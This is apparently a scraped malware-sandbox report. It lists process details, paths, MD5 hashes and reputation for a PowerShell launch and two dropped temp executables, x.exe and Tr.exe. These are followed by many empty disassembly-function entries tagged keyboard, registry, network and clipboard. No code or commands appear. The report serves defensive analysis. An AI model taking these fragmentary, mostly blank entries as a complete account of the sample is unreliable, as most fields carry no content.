Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 04:21:46 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faf0000 |
File size: | 443'392 bytes |
MD5 hash: | A575A7610E5F003CC36DF39E07C4BA7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | true |
Target ID: | 11 |
Start time: | 04:21:54 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\x.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'178'304 bytes |
MD5 hash: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | false |
Target ID: | 12 |
Start time: | 04:21:55 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Tr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x3a0000 |
File size: | 915'456 bytes |
MD5 hash: | 4D3B21451ED0EE3EE65888D4C8944693 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Execution Graph
Execution Coverage: | 3.2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 9.8% |
Total number of Nodes: | 2000 |
Total number of Limit Nodes: | 26 |
Graph
Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044BF8B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92fileCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040F4E0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045C730 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00443D19 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00432017 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433998 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00472663 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00466FAF Relevance: 1.3, APIs: 1, Instructions: 29COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00464EAE Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046CEF3 Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045DE8F Relevance: 3.1, APIs: 2, Instructions: 55fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044AF6C Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040FA10 Relevance: .6, Instructions: 607COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004129D0 Relevance: .4, Instructions: 355COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004125E8 Relevance: .3, Instructions: 349COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00412216 Relevance: .3, Instructions: 332COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00411E78 Relevance: .3, Instructions: 326COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00454E8D Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 213windowlibraryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045DF23 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458EAB Relevance: 25.6, APIs: 17, Instructions: 117COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00470E96 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436F47 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111threadCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469DF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
